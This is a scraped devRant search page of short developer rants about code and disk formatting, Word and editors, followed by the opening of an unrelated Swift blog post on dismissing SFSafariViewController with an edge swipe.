                let vConstraints = NSLayoutConstraint.constraintsWithVisualFormat("V:|-0-[edgeView]-0-|", options: options, metrics: nil, views: bindings)
                view?.addConstraints(hConstraints)
                view?.addConstraints(vConstraints)
            }
            return _edgeView
        }
    }

    private var _edgeView: UIView?
}

In the presentation completion handler I add a UIScreenEdgePanGestureRecognizer to our edge view.

@IBAction func showSafariViewController(sender: AnyObject) {
    let safariViewController = SCSafariViewController(URL: NSURL(string: "")!)
    safariViewController.delegate = self
    safariViewController.transitioningDelegate = self
    self.presentViewController(safariViewController, animated: true) { () -> Void in
        let recognizer = UIScreenEdgePanGestureRecognizer(target: self, action: "handleGesture:")
        recognizer.edges = UIRectEdge.Left
        safariViewController.edgeView?.addGestureRecognizer(recognizer)
    }
}

Then it's a simple matter of creating a custom transition animation. It's standard boilerplate. I also add a shadow when transitioning views, to mimic UINavigationController's push and pop animations. Included in sample code. (A sketch of the handleGesture: method wired up above appears at the end of this post.) I really think this is the least bad trade-off. In reality, swiping from the edge to go to the previous page still works in SFSafariViewController. You have to swipe from very close to, but not exactly at, the edge. No one will discover this, though, so it's effectively useless. Sample project can be found here. Repo currently only contains the Swift sample. As I need it for my ObjC-only app, I will add an ObjC sample as well soon. For questions or suggestions I'm @stringcode. Thank you for reading!
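The handleGesture: selector isn't shown in the post; a rough Swift 2-style sketch of how it could drive an interactive dismissal follows. The names and the 0.4 threshold are my own, and the interaction controller would still need to be returned from the presenting controller's transitioning delegate (which the post sets via transitioningDelegate = self):

// Inside the presenting view controller:
var interactionController: UIPercentDrivenInteractiveTransition?

func handleGesture(recognizer: UIScreenEdgePanGestureRecognizer) {
    let width = recognizer.view!.bounds.width
    let progress = max(0, min(1, recognizer.translationInView(recognizer.view!).x / width))
    switch recognizer.state {
    case .Began:
        interactionController = UIPercentDrivenInteractiveTransition()
        dismissViewControllerAnimated(true, completion: nil)   // kicks off the dismissal
    case .Changed:
        interactionController?.updateInteractiveTransition(progress)
    case .Ended where progress > 0.4:
        interactionController?.finishInteractiveTransition()
        interactionController = nil
    default:
        interactionController?.cancelInteractiveTransition()   // too short a swipe, or cancelled
        interactionController = nil
    }
}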
http://www.stringcode.co.uk/push-pop-modal-sfsafariviewcontroller-hacking-swipe-from-edge-gesture/
CC-MAIN-2020-24
en
refinedweb
On Wed, 13 Jun 2001, Neil Macneale wrote:
> In article <9g5fc4$m8u$01$1 at news.t-online.com>, "Jochen Riekhof"
> <jochen at riekhof.de> wrote:
>
> > I am missing something like the c/Java ?: operator.
>
> The ?: operator is overrated. For the time you save typing, you
> are wasting someone else's because they need to figure out what you were
> thinking.

Trust me, this is true. Compare the following actual examples:

public static final String aan(String s) {
    char x = s.charAt(0);
    return (((x == 'a') || (x == 'e') || (x == 'i') || (x == 'o') || (x == 'u') ||
             (x == 'A') || (x == 'E') || (x == 'I') || (x == 'O') || (x == 'U'))
            ? "an " : "a ");
}

import string

def aan(name):
    """Utility which returns 'a' or 'an' for a given noun.
    """
    if string.lower(name[0]) in ('a','e','i','o','u'):
        return 'an '
    else:
        return 'a '

Now, if you're getting paid per line of code, I could see how the first example works better for you... but this was the *least* convoluted use of the ? operator in all of the code that I could find; and I think it's pretty clear which approach looks nicer.

> > if elif else is not a proper substitute for switches, as the variable in
>
> I have found that using a dictionary of function pointers sometimes gives
> the switch statement feel. For example, point to constructors...
>
> cases = {"dog": Dog, "cat": Cat, "rabbit": Rabbit}
>
> def createPet(type="cat"):
>     if cases.has_key(type): return cases[type]() # Good input...
>     else: return None # bad input, or 'default' in C/java

The idiom that I've come to particularly like in Python, given a case like that:

class PetShop:
    def pet_cat(self, name):
        ...
    def pet_dog(self, name):
        ...
    def pet_dinosaur(self, name):
        ...
    def buyPet(self, name="pooky", petType="cat"):
        petFunc = getattr(self, "pet_%s" % petType, None)
        if petFunc:
            return petFunc(name)
        else:
            # 'default' case mentioned above; usually raise something

> The above code is generally hard to read, so use sparingly and comment
> well. The thing I like about it is that the keys can be of any type. One
> problem is that all the functions called are going to need similar
> parameters, but sometimes it's a useful trick.

If you use the specially-named-methods approach, it's almost self-documenting! I use this all over the place and I really like the way it helps to organize code (it also makes testing easier, since each method can be tested separately). It's like you can invent your own "adjectives" to describe methods.

try-doing-*that*-in-java-ly y'rs,

@ t w i s t e d m a t r i x . c o m
https://mail.python.org/pipermail/python-list/2001-June/077346.html
CC-MAIN-2020-24
en
refinedweb
sample of getting console key

Sample code showing how to detect a key press from the console. The readable() function in the Serial class checks whether the receive buffer has data. This is roughly equivalent to the kbhit() function in a DOS/Windows environment.

main.cpp

Committer: okano
Date: 2016-04-09
Revision: 0:06c67ac20cd3

File content as of revision 0:06c67ac20cd3:

#include "mbed.h"

Serial pc( USBTX, USBRX );
BusOut leds( LED4, LED3, LED2, LED1 );

int main() {
    while (1) {
        if ( pc.readable() ) {
            leds = pc.getc() - '0';
        }
    }
}
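As a variation on the polling loop, the same mbed Serial API also supports interrupt-driven receive via attach(); a sketch (not part of the original sample):

#include "mbed.h"

Serial pc( USBTX, USBRX );
BusOut leds( LED4, LED3, LED2, LED1 );

// Called from the serial receive interrupt whenever a byte arrives.
void on_rx() {
    leds = pc.getc() - '0';
}

int main() {
    pc.attach( &on_rx );   // register the RX callback
    while (1) {
        wait( 1.0 );       // main loop is free for other work
    }
}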
https://os.mbed.com/users/okano/code/getting_console_key_sample/file/06c67ac20cd3/main.cpp/
CC-MAIN-2020-24
en
refinedweb
In this blog post, we will learn how to generate a unique identifier (UUID) in React, with examples. Sometimes we have a use case that calls for generating a unique random identifier, or UUID. A UUID is a unique value that is not repeated. UUIDs are mostly used to identify a visitor or user, for example for session values, privacy functionality, and chat applications. A GUID is a 128-bit value divided into five groups separated by hyphens. This code works with both React and React Native. React is a popular UI framework for building web and mobile applications.

UUID generation can be integrated in several ways:
1. Write custom code in the application.
2. Use the uuid npm package, a popular npm package for Node.js applications.

In this example, we are going to learn how to generate a unique ID on a button click. Here are the steps for the example code:

import React, { Component } from 'react';
import './App.css';
import { default as UUID } from "uuid";

class App extends Component {
  constructor(props) {
    super(props);
    // hold the generated UUID in component state
    this.state = { id: '' };
    this.updateState = this.updateState.bind(this);
  }

  componentWillMount() {
    // generate an initial UUID before the first render
    this.setState({ id: UUID.v4() });
  }

  updateState() {
    // generate a fresh UUID on every button click
    this.setState({ id: UUID.v4() });
  }

  render() {
    return (
      <div>
        <label>{this.state.id}</label>
        <button onClick={this.updateState}>Click Me</button>
      </div>
    );
  }
}

export default App;
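Beyond the button demo, the same package can cover the visitor-identification use case mentioned at the top. A sketch — the "visitorId" storage key is arbitrary, and the import style follows the example above (newer uuid versions expose a named v4 export instead):

import { default as UUID } from "uuid";

// Return a stable per-visitor id, generating and persisting one if needed.
export function getVisitorId() {
  let id = localStorage.getItem("visitorId");
  if (!id) {
    id = UUID.v4();
    localStorage.setItem("visitorId", id);
  }
  return id;
}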
https://www.cloudhadoop.com/2018/10/react-uuid-component-generator-example
CC-MAIN-2020-24
en
refinedweb
There is often a trade-off when it comes to efficiency of CPU vs memory usage. In this post, I will show how the lru_cache decorator can cache the results of a function call for quicker future lookup.

from functools import lru_cache

@lru_cache(maxsize=2**7)
def fib(n):
    if n == 1:
        return 0
    if n == 2:
        return 1
    return fib(n - 1) + fib(n - 2)

In the code above, maxsize indicates the number of call results to store. Setting it to None will make it so that there is no upper bound. The documentation recommends setting it equal to a power of two. Do note though that lru_cache does not make the execution of the lines in the function faster. It only stores the results of the function in a dictionary.
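The wrapped function also exposes cache statistics via cache_info() and can be reset with cache_clear(), which is handy for confirming the memoization is actually kicking in:

print(fib(32))           # first call: the recursion populates the cache
print(fib.cache_info())  # CacheInfo(hits=29, misses=32, maxsize=128, currsize=32)
fib.cache_clear()        # reset the cache, e.g. between benchmarks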
https://brandonrozek.com/blog/pymemoization/
CC-MAIN-2020-24
en
refinedweb
NAME

icmp — Internet Control Message Protocol

SYNOPSIS

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int socket(AF_INET, SOCK_RAW, proto);

DESCRIPTION

ICMP messages are classified according to the type and code fields present in the ICMP header. The abbreviations for the types and codes may be used in rules in pf.conf(5). The following types are defined:

The following codes are defined:

MIB Variables

- icmplim - (integer) Bandwidth limit for ICMP replies in packets/second. If set to zero, no limiting will occur. Defaults to 200.
- icmplim_output - (boolean) Enable/disable logging of ICMP replies being rate limited. Defaults to true.
- drop_redirect - (boolean) Enable/disable dropping of ICMP Redirect packets. Defaults to false.
- log_redirect - (boolean) Enable/disable logging of ICMP Redirect packets. Defaults to false.
- bmcastecho - (boolean) Enable/disable replies to ICMP echo requests destined to broadcast or multicast addresses. Defaults to false.
- reply_from_interface - (boolean) Use the IP address of the interface the packet came through in for responses to packets which are not directly addressed to us. By default, continue with normal source selection. Enabling this option is particularly useful on routers because it makes external traceroutes show the actual path a packet has taken instead of the possibly different return path.
- tstamprepl - (boolean) Enable/disable replies to ICMP Timestamp packets. Defaults to true.

ERRORS

SEE ALSO

recv(2), send(2), inet(4), intro(4), ip(4), pf.conf(5)

HISTORY

The icmp protocol appeared in 4.3BSD.
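As an illustration of the synopsis above, a minimal sketch that opens the raw ICMP socket (requires superuser privileges; error handling kept short):

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>

int main(void) {
    /* IPPROTO_ICMP selects ICMP as the proto argument */
    int s = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
    if (s == -1) {
        perror("socket");
        return 1;
    }
    /* the socket can now be used with send(2)/recv(2) to exchange ICMP messages */
    return 0;
}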
https://manpages.debian.org/unstable/freebsd-manpages/icmp.4freebsd.en.html
CC-MAIN-2022-05
en
refinedweb
OpenCV with pygtk

In my previous post, I have shown how to integrate OpenCV with pygtk to show images. In this post, I'll be showing how to use OpenCV/SimpleCV with pygtk to show multiple images simultaneously, a continuous stream of images (like a video), etc. I have used multi-threading to call gtk.main(), because if I don't do that, my program will be stuck until gtk.main() ends, and it doesn't end until gtk.main_quit() is explicitly called.

import gtk
from threading import Thread
import gobject

gtk.gdk.threads_init()

As I have mentioned before, gtk.gdk.threads_init() is necessary. The gtk.gdk.threads_init() function initializes PyGTK to use the Python macros that allow multiple threads to serialize access to the Python interpreter (using the Python Global Interpreter Lock (GIL)). The gtk.gdk.threads_init() function must be called before the gtk.main() function. At this point in the application the Python GIL is held by the main application thread. You can get more information about gtk.gdk.threads_init() and the GIL in the pygtk docs.

class DisplayImage():
    def __init__(self, title="SimpleCV"):
        self.img = None
        self.img_gtk = None
        self.done = False
        self.thrd = None
        self.win = gtk.Window()
        self.win.set_title(title)
        self.win.connect("delete_event", self.leave_app)
        self.image_box = gtk.EventBox()
        self.win.add(self.image_box)

    def show_image(self, image):
        self.img = image
        if self.img_gtk is None:
            self.img_flag = 0
            self.img_gtk = gtk.Image()          # Create gtk.Image() only once
            self.image_box.add(self.img_gtk)    # Add Image in the box, only once
        self.img_pixbuf = gtk.gdk.pixbuf_new_from_data(self.img.tostring(),
                                                       gtk.gdk.COLORSPACE_RGB,
                                                       False,
                                                       self.img.depth,
                                                       self.img.width,
                                                       self.img.height,
                                                       self.img.width * self.img.nChannels)
        self.img_gtk.set_from_pixbuf(self.img_pixbuf)
        self.img_gtk.show()
        self.win.show_all()
        if not self.img_flag:
            self.thread_gtk()   # gtk.main() only once (first time)
            self.img_flag = 1   # change flag

    def thread_gtk(self):
        # changed this function. Improved threading.
        self.thrd = Thread(target=gtk.main, name="GTK thread")
        self.thrd.daemon = True
        self.thrd.start()

    def leave_app(self, widget, data):
        self.done = True
        self.win.destroy()
        gtk.main_quit()

    def isDone(self):
        return self.done

    def quit(self):
        self.done = True
        self.win.destroy()
        gtk.main_quit()

So, here's the complete class that I made to show images in OpenCV/SimpleCV. In show_image, note the call

self.img_gtk.set_from_pixbuf(self.img_pixbuf)

In my previous post it was

image = gtk.image_new_from_pixbuf(img_pixbuf)

So, here's the problem with it. Whenever I do gtk.image_new_from_pixbuf(), it creates a new gtk.Image object at a different address, and hence we would have to add the new object to the box every time and destroy the previous image object that was there in the box. So, instead of that, I have used set_from_pixbuf(), which does not create a new gtk.Image object, but just changes the image.

Now moving on to the threading part: it's very important that you call gtk.main in a thread. And it has to be called only once during the program, otherwise there will be many threading problems. gtk.main has to be called after you have created the widgets, added properties and shown them.

thrd = Thread(target=gtk.main, name="GTK thread")
thrd.daemon = True
thrd.start()

After creating the thread, setting thrd.daemon = True before you start the thread is very necessary, otherwise there will be too many errors and complications with gtk. Believe me, I have faced it for two days. And it was not good.
I have added more functionality to the DisplayImage class, such as getting the co-ordinates of a mouse click, etc. You can find it here on my GitHub. You can also find some examples that I have worked out for SimpleCV there. So, now some examples.

Show an image in OpenCV:

from cv2.cv import *
from pygtk_image import DisplayImage
import time

image = LoadImage("Image name")
image_rgb = CreateImage((image.width, image.height), image.depth, image.channels)
CvtColor(image, image_rgb, CV_BGR2RGB)  # iplImage has BGR colorspace
display = DisplayImage()
display.show_image(image_rgb)
time.sleep(3)
display.quit()

Show an image in SimpleCV:

from SimpleCV import *
from pygtk_image import DisplayImage
import time

image = Image("lenna")
display = DisplayImage(title="SimpleCV")
display.show_image(image.toRGB().getBitmap())
time.sleep(3)
display.quit()

Show multiple images simultaneously in SimpleCV:

from SimpleCV import *
from pygtk_image import *

d1 = DisplayImage()
d2 = DisplayImage()
i1 = Image("lenna")
while not (d1.isDone() or d2.isDone()):
    try:
        d1.show_image(i1.toRGB().getBitmap())
        time.sleep(0.1)
        d2.show_image(i1.toGray().getBitmap())
        time.sleep(0.1)
    except KeyboardInterrupt:
        d1.quit()
        d2.quit()

Show images in a series in SimpleCV:

from SimpleCV import *
from pygtk_image import *

def loadimage():
    image = Image("lenna")
    d = DisplayImage()
    d.show_image(image.toRGB().getBitmap())
    time.sleep(3)
    d.show_image(Image("simplecv").toRGB().getBitmap())
    time.sleep(2)
    d.quit()

if __name__ == "__main__":
    loadimage()

Show captured images from the camera in SimpleCV:

from SimpleCV import *
from pygtk_image import *

cam = Camera()
d = DisplayImage()
while not d.isDone():
    try:
        i = cam.getImage()
        i.drawRectangle(d.mouseX, d.mouseY, 50, 50, width=5)
        d.show_image(i.applyLayers().toRGB().getBitmap())
        time.sleep(0.1)
    except KeyboardInterrupt:
        d.quit()
        break

If you find a better way to show images using pygtk, or a better way to thread gtk.main(), let me know.

P.S. Anxiously waiting for GSoC 2012 results. Only 2 days and 8 hours to go.
https://jayrambhia.com/blog/opencv-with-pygtk
CC-MAIN-2022-05
en
refinedweb
Coinex Smart Chain (hereinafter referred to as CSC) is one of the best blockchain platforms for creating crypto tokens or building DApps. Coinex Smart Chain is presented as a highly secure blockchain platform in the crypto space; the CSC blockchain supports multiple token standards for token building, such as CRC20, CRC721 (NFT) and CRC1155, for building smart contracts and decentralized applications. CRC20 tokens are fungible tokens, which means that all units of a CRC20 token have the same value as each other, and CRC20 tokens can be traded on DEX or CEX platforms. Anyone can freely mint CRC20 tokens on the Coinex Smart Chain blockchain; you can use Truffle, Hardhat or the Remix IDE.

In the previous article we discussed how to create a standard fixed-supply CRC20 token, but in this article I will provide a tutorial on how to "Create a Mintable CRC20 Token". Mintable is a feature of CRC20 tokens that allows supply to be increased at any time; usually this is used for stablecoin (fiat-pegged) tokens or game reward tokens that are set up for unlimited supply. The mintable feature allows you to mint any amount at any time.

Create Mintable Token CRC20 Coinex Smart Chain

1. Prepare an EVM Wallet & the Coinex Smart Chain native coin (CET)

You can use the MetaMask wallet in a browser or on an Android smartphone, but for convenience we recommend you use the browser version. Buy CET coins on "Coinex Exchange"; CET coins are used to pay gas fees when creating the CRC20 token smart contract, during the token minting process, and for several other transactions. For this whole process you only need about 10 CET coins, the equivalent of roughly $0.63. This fee is very cheap compared to Ethereum, where you might have to set aside $75-$150 to deploy a smart contract.

2. Solidity Smart Contract

# Solidity Smart Contract (Standard)

pragma solidity ^0.8.4;

import "@openzeppelin/contracts/token/ERC20/ERC20.sol";

contract CryptoVIRMintableToken is ERC20 {
    constructor() ERC20("CryptoVIR Mintable Token", "CVRM1") {
        _mint(msg.sender, 1000 * 10 ** decimals());
    }
}

# Mintable Feature

The following is the mintable feature you need to add to your smart contract so that your CRC20 token has a mint function:

import "@openzeppelin/contracts/access/Ownable.sol";

function mint(address to, uint256 amount) public onlyOwner {
    _mint(to, amount);
}

# Combined Result of the Above

This is the Solidity smart contract you need to paste into the Remix IDE:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.4;

import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "@openzeppelin/contracts/access/Ownable.sol";

contract CryptoVIRMintableToken is ERC20, Ownable {
    constructor() ERC20("CryptoVIR Mintable Token", "CVRM1") {
        _mint(msg.sender, 1000 * 10 ** decimals());
    }

    function mint(address to, uint256 amount) public onlyOwner {
        _mint(to, amount);
    }
}

3. Deploy the Mintable CRC20 Token

I use the Remix IDE to deploy smart contracts; make sure your wallet holds some CET coins.
# Go to the remix.ethereum.org site, connect your wallet, create a new .sol file and paste in the Solidity smart contract code above
# Use compiler version 0.8.4, click "Auto Compile" and enable optimization with 200 runs
# Wait for the compile process to finish; make sure there are no warnings or errors during compilation, and that a green check appears on the left
# In the ENVIRONMENT section select "Injected Web3"
# ACCOUNT: select the wallet you are using to deploy the smart contract
# CONTRACT: choose your smart contract name, for example "CryptoVIRMintableToken"
# Click "Deploy" and confirm the transaction in your wallet
# Wait 3-5 seconds, and check the status of your transaction in the block explorer; once fully confirmed, your token exists on the Coinex Smart Chain blockchain
# Deploy process completed. The smart contract is on the blockchain, and the tokens from the initial minting amount were created when it was first deployed.

4. How to Use the CRC20 Minting Feature

Minting is the feature for adding token supply. You can use the Remix IDE or do the minting process on the Coinex Smart Chain (CSC) block explorer; in this article I will show you how to mint in the Remix IDE.

# Because the token we deployed uses 18 decimals, when you want to mint you must append 18 zeros to the amount. For example, to mint 3000 tokens, the value to input is 3000000000000000000000 (3000 followed by 18 zeros)
# In the Remix IDE, scroll to the bottom to "Deployed Contracts"; you will see the smart contract that has been deployed. Click the smart contract to expand it
# Click the "mint" button. In the "to" field, enter the address that will receive the tokens, and in "amount" enter the number of tokens you want to mint. Click "transact" and confirm in your wallet
# After the minting process is complete, the token supply will have increased by the number of tokens you minted

GOOD LUCK
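If you prefer a script over clicking in Remix, the same mint call can be issued with ethers.js. This is a sketch only: the RPC endpoint, private key and contract address are placeholders you must supply, and the ABI fragment matches the contract above:

const { ethers } = require("ethers");

// CSC RPC endpoint: replace with the endpoint you actually use.
const provider = new ethers.providers.JsonRpcProvider("https://rpc.coinex.net");
const wallet = new ethers.Wallet("<OWNER_PRIVATE_KEY>", provider);

// Human-readable ABI fragment for the functions we call.
const abi = [
  "function mint(address to, uint256 amount)",
  "function totalSupply() view returns (uint256)"
];
const token = new ethers.Contract("<TOKEN_CONTRACT_ADDRESS>", abi, wallet);

async function main() {
  // 3000 tokens with 18 decimals: parseUnits appends the 18 zeros for you.
  const tx = await token.mint(wallet.address, ethers.utils.parseUnits("3000", 18));
  await tx.wait();
  console.log("new supply:", (await token.totalSupply()).toString());
}

main();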
https://cryptovir.com/how-to-create-mintable-token-crc20-coinex-smart-chain/
CC-MAIN-2022-40
en
refinedweb
#include <lte-test-uplink-sinr.h>

Definition at line 60 of file lte-test-uplink-sinr.h.

Constructor: TestCase Srs. Definition at line 318 of file lte-test-uplink-sinr.cc. References NS_LOG_INFO.

Destructor. Definition at line 328 of file lte-test-uplink-sinr.cc.

DoRun(): implementation to actually run this TestCase. Subclasses should override this method to conduct their tests.

- Instantiate a single receiving LteSpectrumPhy.
- Generate several calls to LteSpectrumPhy::StartRx corresponding to several signals. One will be the signal of interest, i.e., the LteSpectrumSignalParametersUlSrsFrame of the first signal will have the same CellId as the receiving PHY; the others will have a different CellId and hence will be the interfering signals.
- Build the packet bursts (data and interference).
- Schedule the reception of the data signals plus the interference signals.
- Check that the values passed to LteSinrChunkProcessor::EvaluateSinrChunk() correspond to known values which have been calculated offline (with Octave) for the generated signals.

Implements ns3::TestCase. Definition at line 333 of file lte-test-uplink-sinr.cc. References ns3::LteSpectrumSignalParametersUlSrsFrame::cellId, ns3::SpectrumSignalParameters::duration, ns3::LteTestSinrChunkProcessor::GetSinr(), m_sinr, m_sm, m_sv1, m_sv2, NS_LOG_INFO, NS_TEST_ASSERT_MSG_SPECTRUM_VALUE_EQ_TOL, ns3::SpectrumSignalParameters::psd, and ns3::SpectrumSignalParameters::txPhy.

Member data:
- m_sinr: definition at line 72 of file lte-test-uplink-sinr.h.
- m_sm: definition at line 71 of file lte-test-uplink-sinr.h.
- m_sv1: definition at line 69 of file lte-test-uplink-sinr.h.
- m_sv2: definition at line 70 of file lte-test-uplink-sinr.h.
https://www.nsnam.org/docs/release/3.20/doxygen/class_lte_uplink_srs_sinr_test_case.html
CC-MAIN-2022-40
en
refinedweb
In the process of refactoring an internal tool that connects to the Microsoft Graph API, I re-worked the process of retrieving the authentication token that is needed for making requests to the MS Graph API. While doing some research on how best to get the needed access token, I came across the Microsoft Authentication Library (MSAL) for JavaScript. The library "enables both client-side and server-side JavaScript applications to authenticate users using Azure AD for work and school accounts (AAD), Microsoft personal accounts (MSA), and social identity providers". That sounds like exactly what I was looking for, even though in our use case we don't authenticate users but an application.

To get the access token that we need to authenticate against the MS Graph API, we create a ConfidentialClientApplication and pass the clientId, the clientSecret (both pieces of information you get when creating an application in AAD) and optionally the authority, which identifies the tenant you want to query:

const clientConfig = {
    auth: {
        clientId: 'your_client_id',
        clientSecret: 'your_client_secret',
        authority: 'your_authority',
    }
};

const clientCredentialRequest = {
    scopes: ["https://graph.microsoft.com/.default"],
};

const cca = new msal.ConfidentialClientApplication(clientConfig);
const response = await cca.acquireTokenByClientCredential(clientCredentialRequest);
console.log(response.accessToken);

How can we integrate this with the Microsoft Graph client library for JavaScript that we are using? Luckily, the SDK is pretty extensible. We have to create a class that implements the AuthenticationProvider interface to return the needed access token to the MS Graph API client. This is how we implemented the logic:

import {AuthenticationProvider, AuthenticationProviderOptions} from "@microsoft/microsoft-graph-client";
import * as msal from "@azure/msal-node";

export class ClientTokenAuthProvider implements AuthenticationProvider {
    private readonly clientId: string;
    private readonly clientSecret: string;
    private readonly tenantId: string;

    public constructor(clientId: string, clientSecret: string, tenantId: string) {
        this.clientId = clientId;
        this.clientSecret = clientSecret;
        this.tenantId = tenantId;
    }

    /* eslint-disable @typescript-eslint/no-unused-vars */
    public async getAccessToken(authenticationProviderOptions: AuthenticationProviderOptions | undefined): Promise<string> {
        const clientConfig = {
            auth: {
                clientId: this.clientId,
                clientSecret: this.clientSecret,
                authority: 'https://login.microsoftonline.com/' + this.tenantId,
            }
        };

        const clientCredentialRequest = {
            scopes: ["https://graph.microsoft.com/.default"],
        };

        const cca = new msal.ConfidentialClientApplication(clientConfig);
        const response = await cca.acquireTokenByClientCredential(clientCredentialRequest);
        if (response === null) {
            throw new Error('Not able to retrieve MS Graph API auth token!');
        }
        return Promise.resolve(response.accessToken);
    }
}

We pass the clientId, clientSecret and tenantId when creating the class instance. The tenantId variable is used to create the authority URL, which limits the scope of all queries to our own tenant, e.g. no external users are able to authenticate this way. With the help of the ConfidentialClientApplication class we query the authentication token from the Microsoft web service and return it.
To make the MS Graph API client aware of the ClientTokenAuthProvider, we need to create a ClientOptions configuration and pass in a ClientTokenAuthProvider instance:

import {ClientTokenAuthProvider} from "infrastructure/msgraph/clientTokenAuthProvider";
import {Client, ClientOptions} from "@microsoft/microsoft-graph-client";

const clientId = '...';
const clientSecret = '...';
const tenantId = '...';

const clientOptions: ClientOptions = {
    authProvider: new ClientTokenAuthProvider(clientId, clientSecret, tenantId)
};
const client = Client.initWithMiddleware(clientOptions);

Now when querying the MS Graph API, the JavaScript client will automatically authenticate itself and pass the authentication token to the MS Graph API on each call:

const response = await client.api(`/users`).get();
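One design note on the provider above: it builds a new ConfidentialClientApplication on every getAccessToken call. MSAL Node keeps an in-memory token cache per client instance, so constructing the client once lets repeat calls reuse an unexpired token instead of hitting the token endpoint each time. A sketch of that variant (the class name is mine, everything else mirrors the code above):

import {AuthenticationProvider, AuthenticationProviderOptions} from "@microsoft/microsoft-graph-client";
import * as msal from "@azure/msal-node";

export class CachingClientTokenAuthProvider implements AuthenticationProvider {
    private readonly cca: msal.ConfidentialClientApplication;

    public constructor(clientId: string, clientSecret: string, tenantId: string) {
        // Build the MSAL client once; its token cache then serves repeat calls.
        this.cca = new msal.ConfidentialClientApplication({
            auth: {
                clientId: clientId,
                clientSecret: clientSecret,
                authority: 'https://login.microsoftonline.com/' + tenantId,
            }
        });
    }

    public async getAccessToken(_options?: AuthenticationProviderOptions): Promise<string> {
        const response = await this.cca.acquireTokenByClientCredential({
            scopes: ["https://graph.microsoft.com/.default"],
        });
        if (response === null) {
            throw new Error('Not able to retrieve MS Graph API auth token!');
        }
        return response.accessToken;
    }
}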
https://blog.bitexpert.de/blog/msgraph_with_msal_auth
CC-MAIN-2022-40
en
refinedweb
This functionality provides the ability to create metallicity-dependent X-ray luminosity, emissivity, and photon emissivity fields for a given photon energy range. This works by interpolating from emission tables created from the photoionization code Cloudy or the collisional ionization database AtomDB. These can be downloaded from the command line like so:

# Put the data in a directory you specify
yt download cloudy_emissivity_v2.h5 /path/to/data

# Put the data in the location set by "supp_data_dir"
yt download apec_emissivity_v2.h5 supp_data_dir

The data path can be a directory on disk, or it can be "supp_data_dir", which will download the data to the directory specified by the "supp_data_dir" yt configuration entry. It is easiest to put these files in the directory from which you will be running yt or "supp_data_dir", but see the note below about putting them in alternate locations.

Emission fields can be made for any energy interval between 0.1 keV and 100 keV, and will always be created for luminosity $\rm{(erg~s^{-1})}$, emissivity $\rm{(erg~s^{-1}~cm^{-3})}$, and photon emissivity $\rm{(photons~s^{-1}~cm^{-3})}$. The only required arguments are the dataset object, and the minimum and maximum energies of the energy band. However, typically one needs to decide what will be used for the metallicity. This can either be a floating-point value representing a spatially constant metallicity, or a prescription for a metallicity field, e.g. ("gas", "metallicity"). For this first example, where the dataset has no metallicity field, we'll just assume $Z = 0.3~Z_\odot$ everywhere:

import yt

ds = yt.load("GasSloshing/sloshing_nomag2_hdf5_plt_cnt_0150")

xray_fields = yt.add_xray_emissivity_field(ds, 0.5, 7.0, table_type='apec', metallicity=0.3)

Note: If you place the HDF5 emissivity tables in a location other than the current working directory or the location specified by the "supp_data_dir" configuration value, you will need to specify it in the call to add_xray_emissivity_field:

xray_fields = yt.add_xray_emissivity_field(ds, 0.5, 7.0, data_dir="/path/to/data", table_type='apec', metallicity=0.3)

Having made the fields, one can see which fields were made:

print (xray_fields)

['xray_emissivity_0.5_7.0_keV', 'xray_luminosity_0.5_7.0_keV', 'xray_photon_emissivity_0.5_7.0_keV']

The luminosity field is useful for summing up in regions like this:

sp = ds.sphere("c", (2.0, "Mpc"))
print (sp.quantities.total_quantity("xray_luminosity_0.5_7.0_keV"))

7.452771760764334e+44 erg/s

Whereas the emissivity fields may be useful in derived fields or for plotting:

slc = yt.SlicePlot(ds, 'z', ['xray_emissivity_0.5_7.0_keV', 'xray_photon_emissivity_0.5_7.0_keV'], width=(0.75, "Mpc"))
slc.show()

The emissivity and the luminosity fields take the values one would see in the frame of the source. However, if one wishes to make projections of the X-ray emission from a cosmologically distant object, the energy band will be redshifted. For this case, one can supply a redshift parameter and a Cosmology object (either from the dataset or one made on your own) to compute X-ray intensity fields along with the emissivity and luminosity fields.
This example shows how to do that, where we also use a spatially dependent metallicity field and the Cloudy tables instead of the APEC tables we used previously:

ds2 = yt.load("D9p_500/10MpcBox_HartGal_csf_a0.500.d")

# In this case, use the redshift and cosmology from the dataset,
# but in theory you could put in something different
xray_fields2 = yt.add_xray_emissivity_field(ds2, 0.5, 2.0, redshift=ds2.current_redshift, cosmology=ds2.cosmology, metallicity=("gas", "metallicity"), table_type='cloudy')

Now, one can see that two new fields have been added, corresponding to X-ray intensity / surface brightness when projected:

print (xray_fields2)

['xray_emissivity_0.5_2.0_keV', 'xray_luminosity_0.5_2.0_keV', 'xray_photon_emissivity_0.5_2.0_keV', 'xray_intensity_0.5_2.0_keV', 'xray_photon_intensity_0.5_2.0_keV']

Note also that the energy range now corresponds to the observer frame, whereas in the source frame the energy range is between emin*(1+redshift) and emax*(1+redshift). Let's zoom in on a galaxy and make a projection of the intensity fields:

prj = yt.ProjectionPlot(ds2, "x", ["xray_intensity_0.5_2.0_keV", "xray_photon_intensity_0.5_2.0_keV"], center="max", width=(40, "kpc"))
prj.set_zlim("xray_intensity_0.5_2.0_keV", 1.0e-32, 5.0e-24)
prj.set_zlim("xray_photon_intensity_0.5_2.0_keV", 1.0e-24, 5.0e-16)
prj.show()

Warning: The X-ray fields depend on the number density of hydrogen atoms, given by the yt field H_nuclei_density. In the case of the APEC model, this assumes that all of the hydrogen in your dataset is ionized, whereas in the Cloudy model the ionization level is taken into account. If this field is not defined (either in the dataset or by the user), it will be constructed using abundance information from your dataset. Finally, if your dataset contains no abundance information, a primordial hydrogen mass fraction (X = 0.76) will be assumed.

(XrayEmissionFields.ipynb; XrayEmissionFields_evaluated.ipynb; XrayEmissionFields.py)
https://yt-project.org/doc/analyzing/analysis_modules/xray_emission_fields.html
CC-MAIN-2018-22
en
refinedweb
On a plane between Philadelphia and Oslo: I am flying there for NDC2010, where I have a couple of sessions (on WIF. Why do you ask? :-)). I've wanted to visit Norway forever, and I can't tell you how grateful I am to the NDC guys for having me!

Sessions and Network Load Balancers

